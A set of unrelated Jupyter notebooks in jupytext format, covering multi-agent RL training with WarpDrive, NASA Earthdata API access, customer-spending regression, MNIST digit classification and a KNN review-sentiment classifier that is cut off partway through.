[Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.pdf](Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.) # !jupyter nbconvert --to latex --template latex_nrpy_style.tplx Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.ipynb # !pdflatex -interaction=batchmode Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.tex # !pdflatex -interaction=batchmode Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.tex # !pdflatex -interaction=batchmode Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.tex # !rm -f Tut*.out Tut*.aux Tut*.log
notebook/Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # Copyright (c) 2021, salesforce.com, inc.\ # All rights reserved.\ # SPDX-License-Identifier: BSD-3-Clause\ # For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause # Get started quickly with end-to-end multi-agent RL using WarpDrive! This shows a basic example to create a simple multi-agent Tag environment and get training. For more configuration options and indepth explanations, check out the other tutorials and source code. # **Try this notebook on [Colab](http://colab.research.google.com/github/salesforce/warp-drive/blob/master/tutorials/simple-end-to-end-example.ipynb)!** # # ⚠️ PLEASE NOTE: # This notebook runs on a GPU runtime.\ # If running on Colab, choose Runtime > Change runtime type from the menu, then select `GPU` in the 'Hardware accelerator' dropdown menu. # # Dependencies # You can install the warp_drive package using # # - the pip package manager, OR # - by cloning the warp_drive package and installing the requirements. # # On Colab, we will do the latter. # + import sys IN_COLAB = "google.colab" in sys.modules if IN_COLAB: # ! git clone https://github.com/salesforce/warp-drive.git % cd warp-drive # ! pip install -e . else: # ! pip install rl_warp_drive # + import torch from example_envs.tag_continuous.tag_continuous import TagContinuous from warp_drive.env_wrapper import EnvWrapper from warp_drive.training.trainer import Trainer from warp_drive.training.utils.data_loader import create_and_push_data_placeholders pytorch_cuda_init_success = torch.cuda.FloatTensor(8) # + # Set logger level e.g., DEBUG, INFO, WARNING, ERROR import logging logging.getLogger().setLevel(logging.ERROR) # - # # Environment, Training, and Model Hyperparameters # Specify a set of run configurations for your experiments. # Note: these override some of the default configurations in 'warp_drive/training/run_configs/default_configs.yaml'. run_config = dict( name="tag_continuous", # Environment settings env=dict( num_taggers=5, num_runners=20, episode_length=100, seed=1234, use_full_observation=False, num_other_agents_observed=10, tagging_distance=0.02, ), # Trainer settings trainer=dict( num_envs=100, # number of environment replicas (number of GPU blocks used) train_batch_size=10000, # total batch size used for training per iteration (across all the environments) num_episodes=5000, # total number of episodes to run the training for (can be arbitrarily high!) ), # Policy network settings policy=dict( runner=dict( to_train=True, # flag indicating whether the model needs to be trained algorithm="A2C", # algorithm used to train the policy gamma=0.98, # discount rate lr=0.005, # learning rate model=dict( type="fully_connected", fc_dims=[256, 256], model_ckpt_filepath="" ), # policy model settings ), tagger=dict( to_train=True, algorithm="A2C", gamma=0.98, lr=0.002, model=dict( type="fully_connected", fc_dims=[256, 256], model_ckpt_filepath="" ), ), ), # Checkpoint saving setting saving=dict( metrics_log_freq=10, # how often (in iterations) to print the metrics model_params_save_freq=5000, # how often (in iterations) to save the model parameters basedir="/tmp", # base folder used for saving name="continuous_tag", # experiment name tag="example", # experiment tag ), ) # # End-to-End Training Loop # + # Create a wrapped environment object via the EnvWrapper # Ensure that use_cuda is set to True (in order to run on the GPU) env_wrapper = EnvWrapper( TagContinuous(**run_config["env"]), num_envs=run_config["trainer"]["num_envs"], use_cuda=True, ) # Agents can share policy models: this dictionary maps policy model names to agent ids. policy_tag_to_agent_id_map = { "tagger": list(env_wrapper.env.taggers), "runner": list(env_wrapper.env.runners), } # Create the trainer object trainer = Trainer( env_wrapper=env_wrapper, config=run_config, policy_tag_to_agent_id_map=policy_tag_to_agent_id_map, ) # Perform training! trainer.train() # Shut off gracefully trainer.graceful_close() # - # # Learn more and explore our tutorials # To learn more about WarpDrive, take a look at these tutorials # - [WarpDrive basics](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-1-warp_drive_basics.ipynb) # - [WarpDrive sampler](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-2-warp_drive_sampler.ipynb) # - [WarpDrive reset and log](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-3-warp_drive_reset_and_log.ipynb) # - [Creating custom environments](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-4-create_custom_environments.md) # - [Training with WarpDrive](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-5-training_with_warp_drive.ipynb)
tutorials/simple-end-to-end-example.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns # %matplotlib inline # - data = pd.read_csv('FyntraCustomerData.csv') data.shape data.head() # ### 1. Compute -- Use seaborn to create a jointplot to compare the Time on Website and Yearly Amount Spent columns. Is there a correlation? sns.jointplot(x=data['Time_on_Website'],y=data['Yearly_Amount_Spent']) plt.show() data[['Time_on_Website','Yearly_Amount_Spent']].corr() # + # There is no significant correlation between the attributes 'Time on website' an'Yearly amount spent' # - # ### 2. Compute – Do the same as above but now with Time on App and Yearly Amount Spent. Is this correlation stronger than 1st One? sns.jointplot(x=data['Time_on_App'],y=data['Yearly_Amount_Spent']) plt.show() data[['Time_on_App','Yearly_Amount_Spent']].corr() # + # This correlation is better compared to the previous one. # - # ### 3. Compute -- Explore types of relationships across the entire data set using pairplot . Based off this plot what looks to be the most correlated feature with Yearly Amount Spent? sns.heatmap(data.corr()) # + # Length of Membership seems to be most correlated with Yearly amount spent. # - # ### 4. Compute – Create linear model plot of Length of Membership and Yearly Amount Spent. Does the data fits well in linear plot? # + x = data['Length_of_Membership'] y = data['Yearly_Amount_Spent'] m, c = np.polyfit(x, y, 1) plt.plot(x,m*x+c) plt.scatter(x,y) plt.xlabel('Length_of_Membership') plt.ylabel('Yearly_Amount_Spent') plt.title('Length_of_Membership Vs Yearly_Amount_Spent') plt.show() # + # The data fits well with linear plot # - # ### 5. Compute – Train and Test the data and answer multiple questions -- What is the use of random_state=85? from sklearn.model_selection import train_test_split from sklearn.linear_model import LinearRegression from sklearn.metrics import mean_squared_error # + x = data[['Avg_Session_Length', 'Time_on_App', 'Time_on_Website', 'Length_of_Membership']] y = data['Yearly_Amount_Spent'] train_x, test_x, train_y, test_y = train_test_split( x, y, random_state=85, test_size=0.3) # - print(train_x.shape) print(train_y.shape) print(test_x.shape) print(test_y.shape) # ### 6. Compute – Predict the data and do a scatter plot. Check if actual and predicted data match? lin_model = LinearRegression() lin_model.fit(train_x, train_y) predicted = lin_model.predict(test_x) plt.scatter(x=test_y, y= predicted) plt.xlabel('Actual') plt.ylabel('predicted') plt.title('Actual Vs predicted') plt.show() # ### 7. What is the value of Root Mean Squared Error? rmse = np.sqrt(mean_squared_error(test_y,predicted)) rmse
Module 6/Module_6+Case+study+3.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # + [markdown] tags=[] # # NASA Earthdata API Client 🌍 # # ## Overview # # > TL;DR: **earthdata** is uses NASA APIs to search, preview and access NASA datasets on-prem and in the cloud with 4 lines of Python. # # There are many ways to access NASA datasets, we can use the Earthdata search portal. We can use DAAC specific portals or tools. # We could even use data.gov! These web portals are great but... they are not designed for programmatic access and reproducible workflows. # This is extremely important in the age of the cloud and reproducible open science. # # The good news is that NASA also exposes APIs that allows us to search, transform and access data in a programmatic way. # There are already some very useful client libraries for these APIs: # # * python-cmr # * eo-metadata-tools # * harmony-py # * Hyrax (OpenDAP) # * cmr-stac # * others # # Each of these libraries has amazing features and some similarities. # * [cmr-stac](https://medium.com/pangeo/intake-stac-nasa-4cd78d6246b7) is probably the best option for a streamlined workflow from dataset search and discovery to efficiently loading data using python libraries like pandas or xarray. # * [*Harmony-py*](https://harmony.earthdata.nasa.gov/) is the more capable client if we want to pre process the data beforehand(reformat NetCDF to Zarr, reproject, subset). Unfortunately not all datasets are yet covered by Haromny. # # In this context, **earthdata** aims to be a simple library that can deal with the important parts of the metadata so we can access or download data without having to worry if a given dataset is on-prem or in the cloud. # - # ## Querying for data collections # The DataCollection client can query CMR for any collection using all of CMR's Query parameters and has built-in accessors for the common ones. # This makes it ideal for one liners and easier notation. # ### NASA EDL and the Auth class # We import the classes from earthdata from earthdata import Auth, DataCollections, DataGranules, Store # auth = Auth().login(strategy="interactive") auth = Auth().login(strategy="netrc") # ### Auth # # The core function of Auth is to deal with cloud credentials and in some cases CMR authenticated queries. # If we belong to an early adopter group within NASA we can pass the Auth object to the other classes when we instantiate them. # # ```python # # An anonymous query to CMR # Query = DataCollections().keyword('elevation') # # An authenticated query to CMR # Query = DataCollections(auth).keyword('elevation') # ``` # # and it's the same with DataGranules # # # ```python # # An anonymous query to CMR # Query = DataGranules().keyword('elevation') # # An authenticated query to CMR # Query = DataGranules(auth).keyword('elevation') # ``` # + # We can now search for collections using a pythonic API client for CMR. # Query = DataCollections(auth).keyword('fire').temporal("2016-01-01", "2020-12-12") # Query = DataCollections(auth).keyword('GEDI').bounding_box(-134.7,58.9,-133.9,59.2) Query = DataCollections().keyword('elevation').bounding_box(-134.7,58.9,-133.9,59.2) print(f'Collections found: {Query.hits()}') # filtering what UMM fields to print, to see the full record we omit the fields filters # meta is always included as collections = Query.fields(['ShortName','Abstract']).get(10) # Inspect 5 results printing just the ShortName and Abstract collections[0:3] # - # the results from DataCollections and DataGranules are enhanced python dict objects, we still can get all the fields from CMR collections[0]["umm.ShortName"] # The DataCollections class returns python dictionaries with some handy methods. # # ```python # collection.concept_id() # returns the concept-id, used to search for data granules # collection.abstract() # returns the abstract # collection.landing_page() # returns the landing page if present in the UMM fields # collection.get_data() # returns the portal where data can be accessed. # ``` # # The same results can be obtained using the `dict` syntax: # # ```python # collection["meta"]["concept-id"] # concept-id # collection["umm"]["RelatedUrls"] # URLs, with GET DATA, LANDING PAGE etc # ``` # # + # We can now search for collections using a pythonic API client for CMR. Query = DataCollections().daac("PODAAC") print(f'Collections found: {Query.hits()}') collections = Query.fields(['ShortName']).get(20) # Printing 3 collections collections[0] # + # What if we want cloud collections Query = DataCollections().daac("PODAAC").cloud_hosted(True) print(f'Collections found: {Query.hits()}') collections = Query.fields(['ShortName']).get(20) # Printing 3 collections collections[0] # - # Printing the concept-id for the first 10 collections [collection.concept_id() for collection in collections[0:10]] # ## Querying for data granules # # The DataGranules class provides similar functionality as the collection class. To query for granules in a more reliable way concept-id would be the main key. # You can search data granules using a short name but that could (more likely will) return different versions of the same data granules. # # In this example we're querying for 20 data grnaules from ICESat-2 [ATL05](https://nsidc.org/data/ATL03/versions/) version `005` dataset. # + # Generally speaking we won't need the auth instance for queries to collections and granules # Query = DataGranules().short_name('ATL03').version("005").bounding_box(-134.7,58.9,-133.9,59.2) Query = DataGranules().short_name('ATL03').version("005").bounding_box(-134.7,58.9,-133.9,59.2) granules = Query.get(20) print(granules[0:2]) # - # ## Pretty printing data granules # # Since we are in a notebook we can take advantage of it to see a more user friendly version of the granules with the built-in function `display` # This will render browse image for the granule if available and eventually will have a similar representation as the one from the Earthdata search portal # printing 2 granules using display [display(granule) for granule in granules[0:2]] # ### Spatiotemporal queries # # Our granules and collection classes accept the same spatial and temporal arguments as CMR so we can search for granules that match spatiotemporal criteria. # # Query = DataGranules().short_name("ATL03").temporal("2020-03-01", "2020-03-30").bounding_box(-134.7,58.9,-133.9,59.2).version("005") # Always inspects the hits before retrieven the granule metadata, just because it's very verbose. print(f"Granules found: {Query.hits()}") # Now we can print some info about these granules using the built-in methods granules = Query.get(4) data_links = [{'links': g.data_links(), 'size (MB):': g.size()} for g in granules] data_links # + # More datasets to try # C1908348134-LPDAAC_ECS: GEDI L2A Elevation and Height Metrics Data Global Footprint Level V002 # C1968980609-POCLOUD: Sentinel-6A MF Jason-CS L2 P4 Altimeter Low Resolution (LR) STC Ocean Surface Topography # C1575731655-LPDAAC_ECS: ASTER Global Digital Elevation Model NetCDF V003 # Query = DataGranules(auth).short_name('ATL03').version("005") Query = DataGranules().short_name('ATL03').version("005").bounding_box(-134.7,58.9,-133.9,59.2) # Query = DataGranules().concept_id("C1575731655-LPDAAC_ECS").bounding_box(-134.7,58.9,-133.9,59.2) print(f"Granules found: {Query.hits()}") # - # Not all granules have data previews, if they have the granule class will show up to 2 preview images while using Jupyter's display() function granules = Query.get(10) [display(g) for g in granules[0:5]] # Granules are python dictionaries, with fancy nested key/value notation and some extra built-in methods. granules[0]["umm.TemporalExtent.RangeDateTime"] # Size in MB data_links = [{'links': g.data_links(), 'size (MB):': g.size()} for g in granules] data_links # ## **Accessing the data** # # The cloud is not something magical, but having infrastructure on-demand is quite handy to have on many scientific workflows, especially if the data already lives in "the cloud". # As for NASA, a data migration started in 2020 and will continue on the foreseeable future. Not all but most of NASA data will be available on AWS object storage system or S3. # # To work with this data the first thing we need to do is to get the proper credentials for accessing data on their S3 buckets. These credentials are on a per-DAAC base and last a mere 1 hour. In the near future the Auth class will keep track of this to regenerate the credentials as needed. # # With `earthdata` a researcher can get the files regardless if they are on-prem or cloud based with the same API call, although an important consideration is that if we want to access data in the cloud we must run the code in the cloud. This is because some S3 buckets are configured to only allow direct access (s3:// links) if the requester is in the same zone, `us-west-2`. # # ## On-prem access 📡 # # DAAC hosted data # If we want to start the notebook from here we need to execute this cell and uncomment the lines below # Accessing not necessarily means downloading, specially in the cloud. from earthdata import Auth, DataGranules, DataCollections, Store auth = Auth().login(strategy="netrc") store = Store(auth) Query = DataGranules().concept_id("C1997321091-NSIDC_ECS").bounding_box(-134.7,54.9,-100.9,69.2) print(f"Granule hits: {Query.hits()}") # getting more than 6,000 metadata records for demo purposes is going to slow us down a bit so let's get only 100 granules = Query.get(100) granules[0] # Does this granule belong to a cloud-based collection? granules[0].cloud_hosted # since the response is an array of dictionaries we can do pythonic things like ordering the granules by size import operator granules_by_size = sorted(granules, key=operator.itemgetter("size")) # now our array is sorted by size from less to more. Let's print the first 10 granules_by_size[0:3] # %%time # accessing the data on prem means downloading it if we are in a local environment or "uploading them" if we are in the cloud. files = store.get(granules_by_size[0:2], "./data/demo-atl03") # ## Cloud access ☁️ # # Same API, just a different place Query = DataGranules().concept_id("C1968980609-POCLOUD").bounding_box(-134.7,54.9,-100.9,69.2) print(f"Granule hits: {Query.hits()}") cloud_granules = Query.get(100) # is this a cloud hosted data granule? cloud_granules[0].cloud_hosted # Let's pretty print this print(cloud_granules[0]) # + # data_links = cloud_granules[0].data_links(s3_only=True) https_links = [] s3_links = [] for granule in cloud_granules[0:10]: https_links.append(granule.data_links()[0]) s3_links.append(granule.data_links(s3_only=True)[0]) https_links # - # Let's order them by size again. import operator cloud_granules_by_size = sorted(cloud_granules, key=operator.itemgetter("size")) # now our array is sorted by size from less to more. Let's print the first 10 cloud_granules_by_size[0:3] # + # %%time # If we get an error with direct_access=True, most likely is because we are running this code outside the us-west-2 region. # Downloading cloud collection outside us-west-2 causes egress costs to NASA. try: files = store.get(https_links, direct_access=False, local_path="./data/demo-POCLOUD") except Exception as e: # We're probably not in us-west-2 print(f"Error: {e}") # + # %%time # If we get an error with direct_access=True, most likely is because we are running this code outside the us-west-2 region. # Downloading cloud collection outside us-west-2 causes egress costs to NASA. try: files = store.get(cloud_granules_by_size[0:3], direct_access=True, local_path="./data/demo-POCLOUD") except Exception as e: # We're probably not in us-west-2 print(f"Error: {e}") # - # ## Recap # # ```python # from earthdata import Auth, DataGranules, DataCollections, Accessor # auth = Auth().login() # access = Accessor(auth) # # Query = DataGranules(auth).concept_id("C1575731655-LPDAAC_ECS").bounding_box(-134.7,58.9,-133.9,59.2) # granules = Query.get(10) # # preview the data granules # granules # # get the files # files = access.get(granules) # # # ``` # # **Wait, we said 4 lines of Python** # # ```python # # from earthdata import Auth, DataGranules, Accessor # auth = Auth().login() # granules = DataGranules().concept_id("C1575731655-LPDAAC_ECS").temporal("2020-03-01", "2020-03-30").bounding_box(-134.7,58.9,-133.9,59.2).get_all() # files = Accessor(auth).get(granules, local_path='./data') # # # Now to the important science! # ``` # ### Related links # # **CMR** API documentation: https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html # # **EDL** API documentation: https://urs.earthdata.nasa.gov/ # # NASA OpenScapes: https://nasa-openscapes.github.io/earthdata-cloud-cookbook/ # # NSIDC: https://nsidc.org
notebooks/Demo.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here's several helpful packages to load in import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../New folder (2)")) # Any results you write to the current directory are saved as output. # + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" import pandas as pd import torch dataset = pd.read_csv("train.csv", dtype = np.float32) targets_numpy = dataset.label.values features_numpy = dataset.loc[:, dataset.columns != 'label'].values # + _uuid="bd39e8ab0065eb727ea0c58c5cdd6e924bf64508" features_numpy = features_numpy/255 # + _uuid="624c9d022a90dab21d5fa2becb8c96b9056a99c0" print(len(features_numpy),len(targets_numpy)) # + _uuid="677d677e72f1acfef603abf167ee72fa8d692acb" train_features_numpy, train_labels_numpy = features_numpy[:20000], targets_numpy[:20000] print(len(train_features_numpy), len(train_labels_numpy)) # + _uuid="f3cb3a47806ca36b1d91efe9cd02d11d566027e9" valid_features_numpy, valid_labels_numpy = features_numpy[20000:], targets_numpy[20000:] print(len(valid_features_numpy), len(valid_labels_numpy)) # + _uuid="bb4a5bcb8cb5221f0cf667f38877e1e55d0bb3e2" train_features, train_labels = torch.from_numpy(train_features_numpy), torch.from_numpy(train_labels_numpy).type(torch.LongTensor) # + _uuid="05723e6ba4deaef987777e738be56e6382cac968" valid_features, valid_labels = torch.from_numpy(valid_features_numpy), torch.from_numpy(valid_labels_numpy).type(torch.LongTensor) # + _uuid="eb93fb0378f292e76684289a770c2ca58b9851df" import torchvision.transforms as transforms from torchvision import datasets train = torch.utils.data.TensorDataset(train_features,train_labels) test = torch.utils.data.TensorDataset(valid_features,valid_labels) train_loaders = torch.utils.data.DataLoader(dataset = train, batch_size = 64, shuffle = True) test_loaders = torch.utils.data.DataLoader(dataset = test, batch_size = 64, shuffle = True) # + _uuid="f374e6c52d8ea1d9e3422c6aec18ae9abc8c6322" import matplotlib.pyplot as plt plt.imshow(features_numpy[2].reshape(28,28)) plt.axis("off") plt.title(str(targets_numpy[2])) plt.savefig('graph.png') plt.show() # + _uuid="a640cb1554f79c042cfbfbc286947bcdb40d6e8c" import torch.nn as nn import torch.nn.functional as F class Network(nn.Module): def __init__(self): super(Network,self).__init__() self.fc1 = nn.Linear(28*28,400) self.fc2 = nn.Linear(400,10) def forward(self, x): x = F.relu(self.fc1(x)) x = self.fc2(x) return x # + _uuid="06b6d3973fa02030f2e99dcb3bd5ef20ef51ef26" model = Network() # + _uuid="61e9ef84c958eb243a1923b42e93a73174fa0e90" if torch.cuda.is_available(): model.cuda() # + _uuid="9f8055f2c4c9b40ea891f952e66287083b14b5ec" import torch.optim as optim criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(model.parameters(), lr = 0.001) # + _uuid="ff0b0f108f2e28097cc32c29183da781a4840b23" from torch.autograd import Variable epochs = 150 count = 0 loss_list = [] iteration_list = [] model.train() model.cuda() for epochs in range(epochs): for i,(images, labels) in enumerate(train_loaders): model.train() train = Variable(images.view(-1, 28*28)) labels = Variable(labels) if torch.cuda.is_available(): train, labels = train.cuda(), labels.cuda() optimizer.zero_grad() outputs = model(train) loss = criterion(outputs, labels) loss.backward() optimizer.step() count += 1 if count % 50 == 0 and count!=0: correct = 0 total = 0 for image, label in test_loaders: if len(image)==len(label): train = Variable(image.view(-1, 28*28)) if torch.cuda.is_available(): train = train.cuda() label = label.cuda() model.eval() output = model(train) predicted = torch.max(output.data, 1)[1] #print(len(label),len(train)) total += len(label) correct += (predicted == label).sum() accuracy = 100 * correct / float(total) loss_list.append(loss.data) iteration_list.append(count) if count % 500 == 0: # Print Loss print('Iteration: {} Loss: {} Accuracy: {}%'.format(count, loss.data, accuracy)) # - model.eval() testset = pd.read_csv("test.csv", dtype = np.float32) test_numpy = testset.values test_numpy = test_numpy/255 print(len(test_numpy)) test_features = torch.from_numpy(test_numpy) plt.imshow(testset.values[2].reshape(28,28)) plt.axis("off") plt.title("something") plt.savefig('graph.png') plt.show() model.cpu() feat = Variable(test_features[2].view(-1, 28*28)) output = model(feat) predicted = torch.max(output.data, 1)[1] print(predicted.numpy()[0]) key = [] value = [] for i in range(len(test_features)): feat = Variable(test_features[i].view(-1, 28*28)) output = model(feat) predicted = torch.max(output.data, 1)[1] key.append(i+1) value.append(predicted.numpy()[0]) print(len(key),len(value)) op = 2 print(key[op],value[op]) submission = pd.DataFrame({'ImageId':key,'Label':value}) submission.head() submission.to_csv("digit_recognizer3.csv",index=False) print(len(key),len(value)) print(len(submission))
Digit-Recognizer.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.7.7 64-bit (''ml1'': conda)' # name: python37764bitml1condab1e7a9cc0a4b4da2aa1261f0c90e368a # --- # + import string import re import pickle import random from statistics import mean from statistics import stdev import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns # %matplotlib inline from tqdm import tqdm import sqlite3 import prettytable from sklearn.utils import resample from sklearn.preprocessing import StandardScaler from sklearn.model_selection import TimeSeriesSplit from sklearn.metrics import accuracy_score from sklearn.neighbors import KNeighborsClassifier from sklearn.model_selection import train_test_split from sklearn.metrics import roc_auc_score from sklearn.metrics import roc_curve from sklearn.metrics import confusion_matrix from sklearn.metrics import plot_confusion_matrix from sklearn.model_selection import GridSearchCV from sklearn.model_selection import cross_val_score from sklearn.utils.class_weight import compute_class_weight import gensim import nltk from nltk.corpus import stopwords from nltk.stem.wordnet import WordNetLemmatizer from nltk.stem import PorterStemmer from sklearn.feature_extraction.text import TfidfTransformer from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.feature_extraction.text import CountVectorizer from sklearn import metrics # + tags=[] with open('../datafiles/pickles/affr_bow_500','rb') as affr_bow_500: affr_bow_500 = pickle.load(affr_bow_500).toarray() print(affr_bow_500.shape,affr_bow_500[0]) print('----------------------------------------------------------------------------------------------------------------------------------------------') with open('../datafiles/pickles/affr_bigram_bow_500','rb') as affr_bigram_bow_500: affr_bigram_bow_500 = pickle.load(affr_bigram_bow_500).toarray() print(affr_bigram_bow_500.shape,affr_bigram_bow_500[0]) print('----------------------------------------------------------------------------------------------------------------------------------------------') with open('../datafiles/pickles/affr_ngram_tfidf_500','rb') as affr_ngram_tfidf_500: affr_ngram_tfidf_500 = pickle.load(affr_ngram_tfidf_500).toarray() print(affr_ngram_tfidf_500.shape,affr_ngram_tfidf_500[0]) print('----------------------------------------------------------------------------------------------------------------------------------------------') with open('../datafiles/pickles/avg_w2v','rb') as avg_w2v: avg_w2v = np.array(pickle.load(avg_w2v)) print(avg_w2v.shape,avg_w2v[0]) print('----------------------------------------------------------------------------------------------------------------------------------------------') with open('../datafiles/pickles/tdifd_weighted_w2v','rb') as tdifd_weighted_w2v: tdifd_weighted_w2v = np.array(pickle.load(tdifd_weighted_w2v)) print(tdifd_weighted_w2v.shape,tdifd_weighted_w2v[0]) print('----------------------------------------------------------------------------------------------------------------------------------------------') w2v_model = gensim.models.Word2Vec.load("../datafiles/pickles/w2v_model.model") # - w2v_model.wv.most_similar('like') conn = sqlite3.connect('../datafiles/amazon_reviews.sqlite') data = pd.read_sql_query(""" SELECT * FROM Reviews WHERE Score!=3""",conn) def scr(s): if(s>3): return 1 else: return 0 data['Score'] = data['Score'].apply(scr) cus_data = data.drop_duplicates(subset={'UserId','ProfileName', 'Time', 'Text'},keep='first') cus_data = cus_data[cus_data['HelpfulnessNumerator']<=cus_data['HelpfulnessDenominator']] cus_data.reset_index(drop=True,inplace=True) Scr = cus_data['Score'].copy() # + tags=[] df = pd.DataFrame(avg_w2v) df['Y'] = cus_data['Score'] df.reset_index(drop=True) ####################### BALANCING AN SECTION OF DATA #################################### dataa = df.iloc[10000:15000].copy() df_mino = dataa[dataa['Y']==0].copy() df_majo = dataa[dataa['Y']==1].copy() df_minority_upsampled = resample(df_mino,replace=True,n_samples=df_majo.shape[0],random_state=123) df_upsampled = pd.concat([df_majo, df_minority_upsampled]) # - df_upsampled['Y'].value_counts() # - We have to take the data leak into consideration, as if we first convert the text into vectors and then split into test and train then the test will kind off be built with the use of features of the train data. so to avoid such data leackage we need to spilt fist then vectorize the text. # + tags=[] class Knn: def __init__(self,X,Y,splits=5,algorithm='auto',balance=1,scale=0,istext=0,textPreprocessing='BOW'): self.X = np.array(X) self.Y = np.array(Y) self.splits = splits self.algorithm = algorithm self.scale = scale self.istext = istext self.textPreprocessing = textPreprocessing if(istext == 1 and (textPreprocessing =='BOW' or textPreprocessing =='TFIDF')): self.X = np.array(self.text_preprocessing1(self.X)) elif(istext == 1 and (textPreprocessing =='AVG-W2V')): self.X = np.array(self.text_preprocessing2(self.X)) elif(istext == 1 and (textPreprocessing =='TFIDF-W2V')): self.X = np.array(self.text_preprocessing3(self.X)) if(balance == 1): self.Balance() def KNN_TS(self,hyper = list(range(1,100,2))): self.type = 0 self.X_train_n_cv, self.X_test, self.Y_train_n_cv, self.Y_test = train_test_split(self.X,self.Y,test_size=0.3,random_state=0) if(self.scale == 1): self.Scale() tscv = TimeSeriesSplit() TimeSeriesSplit(max_train_size=None, n_splits=self.splits) scrs = list() auroc_score = dict() self.roc_auc_stats = list() for n in tqdm(hyper): cv_fold_score = list() train_fold_score = list() auroc_fold_score = list() # this score is from the cross-validation dataset auroc_fold_score_proba = list() # this is also from cv dataset auroc_fold_train = list() # this is from train dataset for train_index, cv_index in tscv.split(self.X_train_n_cv): X_train,Y_train = self.X_train_n_cv[train_index],self.Y_train_n_cv[train_index] X_cv,Y_cv = self.X_train_n_cv[cv_index],self.Y_train_n_cv[cv_index] model = KNeighborsClassifier(n_neighbors = n, algorithm = self.algorithm) X_train,X_cv = self.vectorize(X_train,X_cv,self.textPreprocessing) model.fit(X_train,Y_train) y_cv_pred_proba = model.predict_proba(X_cv)[:,1] y_cv_pred = model.predict(X_cv) cv_fold_score.append(model.score(X_cv,Y_cv)) train_fold_score.append(model.score(X_train,Y_train)) auroc_fold_score_proba.append(roc_auc_score(Y_cv,y_cv_pred_proba)) auroc_fold_score.append(roc_auc_score(Y_cv,y_cv_pred)) auroc_fold_train.append(roc_auc_score(Y_train,model.predict_proba(X_train)[:,1])) scrs.append([n,mean(cv_fold_score),mean(train_fold_score),mean(auroc_fold_score),mean(auroc_fold_score_proba)]) auroc_score[n] = mean(auroc_fold_score_proba) self.roc_auc_stats.append([n,mean(auroc_fold_train),stdev(auroc_fold_train),mean(auroc_fold_score_proba),stdev(auroc_fold_score_proba)]) max_roc_score = max(auroc_score.values()) scrs = pd.DataFrame(data = scrs,columns=['K','CV score','Train score','AUROC','AUROC with probability']) optimal_k = max(auroc_score, key=auroc_score.get) self.scrs = scrs self.max_roc_score = max_roc_score self.optimal_k = optimal_k self.op_model = KNeighborsClassifier(n_neighbors = optimal_k,algorithm = self.algorithm) self.X_train_n_cv,self.X_train_n_cv = self.vectorize(self.X_train_n_cv,self.X_train_n_cv,self.textPreprocessing) self.op_model.fit(self.X_train_n_cv,self.Y_train_n_cv) return self.op_model def KNN_KCV(self,hyper = list(range(1,100,10))): self.type = 1 self.X = pd.DataFrame(self.X) self.Y = pd.DataFrame(self.Y) self.X_train_n_cv, self.X_test, self.Y_train_n_cv, self.Y_test = train_test_split(self.X,self.Y,test_size=0.25,random_state=0) if(self.scale == 1): self.Scale() indx = list(self.X_train_n_cv.index) random.shuffle(indx) split = [indx[i::self.splits] for i in range(self.splits)] scrs = list() auroc_score = dict() self.roc_auc_stats = list() for n in tqdm(hyper): cv_fold_score = list() train_fold_score = list() auroc_fold_score = list() auroc_fold_score_proba = list() auroc_fold_train = list() for j in range(1,self.splits+1): X_train = self.X_train_n_cv.loc[list(set(self.X_train_n_cv.index)-set(split[j-1]))] Y_train = self.Y_train_n_cv.loc[list(set(self.X_train_n_cv.index)-set(split[j-1]))] X_cv = self.X_train_n_cv.loc[split[j-1]] Y_cv = self.Y_train_n_cv.loc[split[j-1]] model = KNeighborsClassifier(n_neighbors = n, algorithm = self.algorithm) X_train,X_cv = self.vectorize(X_train,X_cv,self.textPreprocessing) model.fit(X_train,Y_train) y_cv_pred_proba = model.predict_proba(X_cv)[:,1] y_cv_pred = model.predict(X_cv) 